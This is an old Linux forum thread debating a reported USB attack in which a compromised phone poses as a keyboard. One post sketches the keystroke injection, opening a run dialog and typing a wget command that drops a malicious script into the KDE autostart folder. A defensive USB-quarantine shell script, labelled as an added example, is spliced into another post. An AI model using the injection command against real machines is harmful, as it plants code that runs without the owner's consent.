LinuxQuestions.org


thorn168 01-20-2011 01:51 PM

Zero day USB Threat
 
Hi Everyone,

Just wanted to share this zero-day USB threat reported on CNET.

It is reported to affect Linux machines.

Here is the link:

http://news.cnet.com/8301-27080_3-20...CmoreStories.0

jlinkels 01-20-2011 02:07 PM

Quote:

...wrote software that changes the functionality of the USB driver so that they could launch a surreptitious attack
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised)? How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

jlinkels

silvyus_06 01-20-2011 02:14 PM

and what can we do about that?
"oh, I know, don't use smartphones, they're too smart asses" hahaha

H_TeXMeX_H 01-20-2011 02:47 PM

I think they're hacking the computer using a charging phone ... this, of course, assumes that the phone was hacked. Meh, not that interesting. Why would I charge my phone with a USB port (it doesn't even have a USB port), and how would it get hacked? This is more of a phone security issue that happens to also affect computers connected to it.

John VV 01-20-2011 11:36 PM

It is turning the phone into a keyboard using a USB cable.

When one plugs in the "hacked phone" it is seen as the keyboard and NOT as the phone;
then the "new" keyboard has root access to the system and the payload can be inserted.

But if you have physical access then this can be done by other means, so...
Ars has a review of the CNET news:
http://arstechnica.com/security/news...sb-drivers.ars

jschiwal 01-21-2011 12:00 AM

John VV: Plugging in a USB keyboard device gives you a root shell?

win32sux 01-21-2011 06:16 AM

Extremely interesting vulnerability! Thanks for the link to the article! :)

thorn168 01-21-2011 10:29 AM

At first blush this exploit may not seem very threatening, but if you replace the smartphone with, say, an iPod or similar USB charging device, trouble could follow. In context, who would have imagined that something like Stuxnet would be a threat, as it specifically targeted only a very specific OS running a centrifuge.

jlinkels 01-21-2011 03:54 PM

But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

About Stuxnet: Infection of the PLCs was done through infecting Windows PCs. Siemens (the PLC manufacturer) builds industrial equipment based on proprietary hardware, but relies fully on Windows for both development and the user interface. Not even hardened or embedded Windows, but plain commercial desktop XP. Many protocols between PLCs and Windows are proprietary, and only available on Windows. I gather it is not that difficult to infect a Windows PC and then, while there are already open connections between PCs and PLCs, to use these connections to crack the PLC. The development protocols go much further than just uploading the software, and deeply affect the running PLC in both code and data. The originality of this Stuxnet attack was that it was focused on just one installation. Not that a PLC was infected through a PC, and cracking the PLC is not that difficult. If it was really the US and Israeli governments behind this attack, they had plenty of resources to develop such tools.

jlinkels

win32sux 01-21-2011 08:34 PM

Quote:

Originally Posted by jlinkels (Post 4232027)
It is not quite clear to me exactly what functionality has been added and where. Is it the USB driver of the host (= the machine to be compromised)? How would that be done?

Is it in the USB device? So if the USB device emulates a keyboard, so what? Would the risk be greater as an arbitrary keyboard connected to a Linux computer? Does the human interface get administrator rights by magic?

To me it looks a little bit like the author has once seen a Linux computer which did not pop up a window when a USB device was connected, and based on that drew the conclusion that a dangerous situation could arise. (Like the "warning! are you sure that you want to continue..." dialog boxes in Windows protect users from doing something stupid!)

Quote:

Originally Posted by jlinkels (Post 4233419)
But then again, how does it work, and how does it work in Linux? Like I asked before, the article is by far not specific enough. Apparently you understand it well enough to consider it a threat, so please explain.

The attack code makes the smartphone pretend to be a keyboard/mouse. This allows really nasty stuff to be done (while the smartphone is innocently being charged/whatever), such as copying your personal documents or planting incriminating evidence on your computer. While this doesn't on its own get the bad guy privilege escalation, a root exploit can be part of the attack payload if he/she desires.

cepheus11 01-22-2011 04:55 AM

Quote:

Originally Posted by jlinkels (Post 4233419)
But then again, how does it work, and how does it work in Linux?

I can imagine the following scenario: I use KDE. The shortcut for the "Run" dialog in KDE is Alt-F2. The autostart directory for users is ~/.kde4/Autostart. The USB stick or smartphone could register as a keyboard. Then it sends "Press Alt" - "Press F2" - "Release F2" - "Release Alt", followed by "wget --directory-prefix=~/.kde4/Autostart (URL to malicious script)" and "Enter". Next time I log in, (malicious script) is executed (details like x permissions ignored here). I can see this on the screen, if I watch.

I don't consider this a real (or new) threat for me, because someone with physical access could simply do this by hand anyway. A smartphone needs to be really hacked - not just have an app installed. I don't think the app API exposes the USB driver stack to spoof the device class.

Read the discussion thread on the arstechnica article, there are some more ideas how this could be turned into a real threat.

eSelix 01-22-2011 05:58 AM

Interesting. The main reason for the existence of this threat is that devices connected to a USB port are not authenticated by the user. It is a compromise between comfort (just plug and use) and security. The USB drivers should get an option to authenticate, but I don't know how one device can be distinguished from another of the same model. So for now all devices presenting themselves as a keyboard or mouse should be paused (by the driver) from accessing the computer until the user of this computer allows them to connect. In the meantime we should not connect untrusted devices.
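A defender-side sketch of the "pause keyboard-class devices until the user allows them" idea from this post, and of the keyboard-impersonation scenario in the post above it. This is an added example, not code from the thread; it assumes a Linux kernel that exposes a per-interface `authorized` file under each USB interface directory in sysfs (real use would point it at /sys/bus/usb/devices as root), and it runs here against a constructed fake sysfs tree.

```shell
#!/bin/sh
# Added example (not from the thread). Quarantine newly attached USB HID
# interfaces by clearing their sysfs "authorized" flag, so a device that
# suddenly claims to be a keyboard stays inert until a human re-enables it.
# Assumption: per-interface authorization, i.e. an "authorized" file inside
# each usbX-Y:Z.W interface directory. Real use: quarantine_hid /sys/bus/usb/devices

# quarantine_hid ROOT -> prints the interface names it de-authorized, one per line
quarantine_hid() {
    root=$1
    for iface in "$root"/*:*; do            # interface dirs look like 2-3:1.0
        [ -f "$iface/bInterfaceClass" ] || continue
        cls=$(cat "$iface/bInterfaceClass")
        # 03 = Human Interface Device (keyboards, mice): the class the
        # "charging phone" in the thread would impersonate.
        [ "$cls" = "03" ] || continue
        [ -f "$iface/authorized" ] || continue
        echo 0 > "$iface/authorized"        # needs root on a real sysfs
        basename "$iface"
    done
}

# Constructed fake sysfs tree so the example runs without root or hardware:
# a mass-storage stick (class 08) and a "phone" exposing a HID interface (class 03).
make_fake_sysfs() {
    dir=$(mktemp -d)
    for i in 1-1:1.0 2-3:1.0; do
        mkdir -p "$dir/$i"
        echo 1 > "$dir/$i/authorized"
    done
    echo 08 > "$dir/1-1:1.0/bInterfaceClass"
    echo 03 > "$dir/2-3:1.0/bInterfaceClass"
    echo "$dir"
}

fake=$(make_fake_sysfs)
quarantine_hid "$fake"                  # prints 2-3:1.0; the storage stick is left alone
rm -rf "$fake"
```

To re-enable a device you have inspected, write 1 back to the same `authorized` file; hooking the script into a udev add rule would make the quarantine automatic rather than manual.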

jlinkels 01-22-2011 06:54 AM

Well, I still fail to see the reason for the excitement in this article. A USB device is connected to a computer and emulates a keyboard. So? It has long been known exactly what risks are imposed when one has physical access to a Linux computer. One can reboot the machine and gain root access. But that is not the case here.

What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

As far as I understand, this exploit does not enable the change of the USB driver present on the host (the computer to be infected), does it? It would be different if the USB device provided its own driver, which in turn is installed by the host using root credentials.

jlinkels

cepheus11 01-22-2011 08:44 AM

Quote:

Originally Posted by jlinkels (Post 4233916)
What is the difference between a remote SSH connection and an emulated keyboard? What is the difference between an e-mail with malicious content which can be run with user credentials and an emulated keyboard wedging in characters using the same user credentials?

Active contents in e-mails/web pages are even more dangerous because they come remotely and can run completely unnoticed, but they require a security hole or user interaction.

But yes, the real-life threat level of this exploit is often exaggerated.

thorn168 01-25-2011 03:23 PM

I realized that I know how someone with bad intentions could exploit this vulnerability to do bad things, but I decline to provide this information because I do not wish to inspire those with bad intentions to "publish" a proof of concept.

Some things should just not be public knowledge.
